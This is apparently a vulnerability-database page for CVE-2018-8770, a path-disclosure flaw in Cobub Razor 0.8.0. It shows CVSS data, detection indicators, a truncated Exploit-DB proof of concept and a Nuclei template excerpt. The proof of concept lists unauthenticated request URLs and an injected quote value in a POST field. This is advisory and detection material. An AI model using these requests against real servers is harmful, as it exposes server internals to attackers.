CVE-2018-8770
published 2018-03-18CVE-2018-8770: Physical path Leakage exists in Western Bridge Cobub Razor 0.8.0 via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php…
PriorityP353medium5.3CVSS 3.1
AVNACLPRNUINSUCLINAN
EXPLOIT
EPSS
60.59%
99.0th percentile
Physical path Leakage exists in Western Bridge Cobub Razor 0.8.0 via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php in tests/.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cobub | razor | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →HTTP GET request to /tests/generate.php returning HTTP 200 with a PHP Fatal error message disclosing the physical path is a confirmed indicator of exploitation. ↗
- →Response header or body containing the string '/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line' confirms physical path leakage. ↗
- →Match both the Fatal error class-not-found string AND the CIUnitTestCase.php path string together in the response (condition: AND) to reduce false positives. ↗
- ·The vulnerability is specific to Cobub Razor version 0.8.0; other versions are not confirmed affected. ↗
- ·The path leakage is triggered by unauthenticated HTTP GET requests; no authentication or special headers are required, making it trivially exploitable from the internet. ↗
CVSS provenance
nvdv3.15.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Cobub Razor 0.8.0 - Physical Path Leakage
exploitdb·2018-04-20·CVSS 5.3
CVE-2018-8770 [MEDIUM] Cobub Razor 0.8.0 - Physical Path Leakage
Cobub Razor 0.8.0 - Physical Path Leakage
---
# Exploit Title: Cobub Razor 0.8.0 Physical path Leakage Vulnerability
# Date: 2018-04-19
# Exploit Author: Kyhvedn
# Vendor Homepage: http://www.cobub.com/
# Software Link: https://github.com/cobub/razor
# Version: 0.8.0
# CVE : CVE-2018-8770
#PoC:
URL: http://localhost/export.php
HTTP Method: GET
URL: http://localhost/index.php?/manage/channel/addchannel
HTTP Method: POST
Data: channel_name=test"&platform=1
HTTP Method: GET
http://localhost/tests/generate.php
http://localhost/tests/controllers/getConfigTest.php
http://localhost/tests/controllers/getUpdateTest.php
http://localhost/tests/controllers/postclientdataTest.php
http://localhost/tests/controllers/posterrorTest.php
http://localhost/tests/controllers/posteventTest.php
http://localh
Nuclei
Cobub Razor 0.8.0 - Information Disclosure
nuclei·CVSS 5.3
CVE-2018-8770 [MEDIUM] Cobub Razor 0.8.0 - Information Disclosure
Cobub Razor 0.8.0 - Information Disclosure
Cobub Razor 0.8.0 is susceptible to information disclosure via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.
Template:
id: CVE-2018-8770
info:
name: Cobub Razor 0.8.0 - Information Disclosure
author: princechaddha
severity: medium
description: Cobub Razor 0.8.0 is susceptible to information disclosure via generate.php, controllers/
No writeups or analysis indexed.
2018-03-18
Published